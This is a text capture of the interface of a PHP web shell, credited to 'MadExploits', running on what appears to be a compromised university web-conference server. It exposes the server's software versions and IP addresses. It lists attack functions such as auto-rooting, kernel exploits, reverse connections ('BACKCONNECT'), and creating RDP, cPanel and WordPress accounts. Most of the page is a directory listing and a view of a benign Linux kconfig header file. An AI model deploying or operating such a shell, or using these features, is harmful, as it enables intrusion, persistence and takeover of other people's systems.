Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.224.68.75
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.4.0-186 /
scripts /
kconfig /
[ HOME SHELL ]
Name
Size
Permission
Action
lxdialog
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitignore
97
B
-rw-r--r--
Makefile
7.08
KB
-rw-r--r--
conf.c
14.86
KB
-rw-r--r--
confdata.c
27.89
KB
-rw-r--r--
expr.c
30.07
KB
-rw-r--r--
expr.h
9.68
KB
-rw-r--r--
gconf-cfg.sh
733
B
-rwxr-xr-x
gconf.c
38.06
KB
-rw-r--r--
gconf.glade
25.04
KB
-rw-r--r--
images.c
6.32
KB
-rw-r--r--
images.h
752
B
-rw-r--r--
lexer.l
9.11
KB
-rw-r--r--
list.h
3.66
KB
-rw-r--r--
lkc.h
3.81
KB
-rw-r--r--
lkc_proto.h
2.42
KB
-rw-r--r--
mconf-cfg.sh
1.11
KB
-rwxr-xr-x
mconf.c
27.33
KB
-rw-r--r--
menu.c
21.38
KB
-rw-r--r--
merge_config.sh
4.64
KB
-rwxr-xr-x
nconf-cfg.sh
1.18
KB
-rwxr-xr-x
nconf.c
38.16
KB
-rw-r--r--
nconf.gui.c
14.77
KB
-rw-r--r--
nconf.h
1.82
KB
-rw-r--r--
parser.y
15.11
KB
-rw-r--r--
preprocess.c
11.07
KB
-rw-r--r--
qconf-cfg.sh
846
B
-rwxr-xr-x
qconf.cc
44.09
KB
-rw-r--r--
qconf.h
7.38
KB
-rw-r--r--
streamline_config.pl
16.16
KB
-rwxr-xr-x
symbol.c
29.04
KB
-rw-r--r--
util.c
2.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lkc_proto.h
/* SPDX-License-Identifier: GPL-2.0 */ #include <stdarg.h> /* confdata.c */ void conf_parse(const char *name); int conf_read(const char *name); int conf_read_simple(const char *name, int); int conf_write_defconfig(const char *name); int conf_write(const char *name); int conf_write_autoconf(int overwrite); bool conf_get_changed(void); void conf_set_changed_callback(void (*fn)(void)); void conf_set_message_callback(void (*fn)(const char *s)); /* menu.c */ extern struct menu rootmenu; bool menu_is_empty(struct menu *menu); bool menu_is_visible(struct menu *menu); bool menu_has_prompt(struct menu *menu); const char * menu_get_prompt(struct menu *menu); struct menu * menu_get_root_menu(struct menu *menu); struct menu * menu_get_parent_menu(struct menu *menu); bool menu_has_help(struct menu *menu); const char * menu_get_help(struct menu *menu); struct gstr get_relations_str(struct symbol **sym_arr, struct list_head *head); void menu_get_ext_help(struct menu *menu, struct gstr *help); /* symbol.c */ extern struct symbol * symbol_hash[SYMBOL_HASHSIZE]; struct symbol * sym_lookup(const char *name, int flags); struct symbol * sym_find(const char *name); const char * sym_escape_string_value(const char *in); struct symbol ** sym_re_search(const char *pattern); const char * sym_type_name(enum symbol_type type); void sym_calc_value(struct symbol *sym); enum symbol_type sym_get_type(struct symbol *sym); bool sym_tristate_within_range(struct symbol *sym,tristate tri); bool sym_set_tristate_value(struct symbol *sym,tristate tri); tristate sym_toggle_tristate_value(struct symbol *sym); bool sym_string_valid(struct symbol *sym, const char *newval); bool sym_string_within_range(struct symbol *sym, const char *str); bool sym_set_string_value(struct symbol *sym, const char *newval); bool sym_is_changeable(struct symbol *sym); struct property * sym_get_choice_prop(struct symbol *sym); const char * sym_get_string_value(struct symbol *sym); const char * prop_get_type_name(enum prop_type type); /* preprocess.c */ enum variable_flavor { VAR_SIMPLE, VAR_RECURSIVE, VAR_APPEND, }; void env_write_dep(FILE *f, const char *auto_conf_name); void variable_add(const char *name, const char *value, enum variable_flavor flavor); void variable_all_del(void); char *expand_dollar(const char **str); char *expand_one_token(const char **str); /* expr.c */ void expr_print(struct expr *e, void (*fn)(void *, struct symbol *, const char *), void *data, int prevtoken);
Close